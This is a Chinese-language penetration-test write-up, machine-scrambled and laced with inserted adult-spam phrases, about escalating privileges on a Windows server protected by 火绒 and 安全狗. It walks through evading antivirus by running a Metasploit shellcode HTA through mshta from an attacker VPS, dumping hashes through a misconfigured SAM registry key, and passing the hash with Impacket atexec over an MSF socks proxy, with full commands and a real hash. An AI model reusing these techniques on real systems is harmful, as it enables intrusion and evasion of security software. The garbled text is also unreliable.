发布日期：2024-12-25 20:55    点击次数：177

0x01 媒介一又友发来一个站让帮看下提权，劳动器上安设的有护卫神+火绒+安全狗等安全督察软件，看着照实挺唬东说念主，他也试了不少常用提权EXP，后果王人失败了，可能是欠缺免杀EXP才略吧，天然也有可能是诞生了这些缝隙，抽空给他看了下并写了这篇记载著作。在拿到权限后用中国菜刀连了下，不外大要被羁系了，教导：劳动器复返无效或不可识别的反映，昔日也屡次际遇这种情况，这里只消换成Godzilla就能日常连系了。0x02 劳动器基本信息征集天然一又友在测试后给提供了些信息，但如故风俗我方去看下，因为每个东说念主掌抓的学问点和实战劝诫不相似，只消我方看了后才知说念安设了哪些环境、WAF/AV和第三方软件，以及绽放了哪些端口、打了若干补丁等，这么能力更好对其系统薄瑕疵进行测试。

劳动器上初始的有：火绒、护卫神主机民众、劳动器安全狗、MySQL数据库和G6FTP，不错尝试提权方式有：护卫神主机民众、MySQL和G6FTP，不外在提权历程中得防止下火绒和劳动器安全狗的查杀和羁系，尽可能的幸免被惩办员发现。

0x03 绕及其绒赢得MSF会话个东说念主风俗在MSF下进行提权，当先咱们先思认识赢得一个会话，火绒默许会羁系web_delivery中的powershell推行和查杀hta_server的hta文献，是以这两种方式在这里是行欠亨的。这里咱们径直驾驭mshta白名单来赢得MSF会话，当先推行以下敕令生成shellcode并推行监听，然后将exp.hta文献中的shellcode替换为MSF的shellcode即可。

艳母在线接着咱们在VPS上用Python开启一个临时Web用于而已调用，然后再去ASPX大马的推行敕令功能处用系统自带的mshta.exe推行exp.hta这个文献后即可上线。

python -m SimpleHTTPServer 8888

python3 -m http.server 8888

0x04 SAM注册表项导出哈希一又友前期也曾测试了许多提权EXP，加上护卫神主机民众为高版块，MySQL也被降权了，是以就不再去测试这些旧例阵势了，G6FTP如故不错去试一下，不外我这用的是另一种终点规阵势。径直驾驭《西部数码云主机失败提权案例》一文中提到的阵势，旨趣也很简便，当SAM注册表项有Users或Everyone的读取权限时就能驾驭MSF下的hashdump模块导出哈希。0x05 atexec擢升System权限也曾驾驭SAM注册表项权限问题导出了主机哈希，但依旧濒临着一些问题，如：莫得明文密码、破解不了哈希、添加不了用户等，如际遇这种场景时应该何如进行下一步测试呢？这时咱们不错尝试使用复古HASH传递的而已敕令推行用具来推行系统敕令，这里以Impacket套件而已敕令推行功能中的atexec来作念演示，其他复古哈希传递的用具以及驾驭方式如下。135端口：

WMIcmd/sharpwmi/WMIHACKER/Sharp-WMIExec；

Impacket：

psexec(445)/wmiexec(135)/smbexec(445)/atexec(445)；

驾驭方式：巨乳 女優

Local腹地推行 、Socks4/5代理 、Metasploit捏造路由表；

这里咱们先将刻下MSF会话添加进捏造路由，然后再用socks_proxy模块开启一个socks5代理，修改下proxychains.conf设立文献，临了用proxychains代理用具来推行atexec即可。Kali的proxychains设立默许在/etc/proxychains.conf，而自行编译安设的proxychains4设立在根目次下/src/proxychains.conf，若何修改就不细说了，设立文献里王人有例子。

[root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf

驾驭proxychains代理用具推行atexec时可能会出现以下报错，且莫得敕令推行回显，但咱们不错先用Ping 9o**mf.dnslog.cn敕令看下是否推行告捷，若是DNSLog收到数据则讲明告捷。

[root@p1600778655 ~]# proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 "cmd /c ping 9o**mf.dnslog.cn"

细则敕令推行告捷后，咱们另起一个敕令末端开启MSF监听，然后再用proxychains代理用具推行atexec，这里再次推行前面用到的exp.hta文献后即可得到主见主机SYSTEM。

meterpreter > run get_local_subnets

meterpreter > run autoroute -s 59.***.***.0/255.255.255.0

meterpreter > bg

msf6 auxiliary(server/socks_proxy) > set username test

msf6 auxiliary(server/socks_proxy) > set password 123456

msf6 auxiliary(server/socks_proxy) > run

踩坑记载-1：若是莫得将刻下MSF会话添加至捏造路由时，即使开了Socks5代理也不行用proxychains代理用具推行atexec，会报出以下无理教导，因为MSF的Socks模块是在VPS上开启一个Socks代理，在莫得添加捏造路由前是不行与主见445端口进行通信，除非是在主见主机上开启Socks代理，然后腹地连系主见开启的Socks后能力与主见445端口进行通信。踩坑记载-2：Socks代理流量也曾通了，关联词在驾驭proxychains代理用具推行atexec时出现了以下报错，且莫得敕令推行回显，推行whoami>1.txt敕令也写不了文献，天然这可能仅仅这个环境出现的个别案例，但咱们不错通过ping dnslog敕令来判断是否推行告捷。0x06 追念

---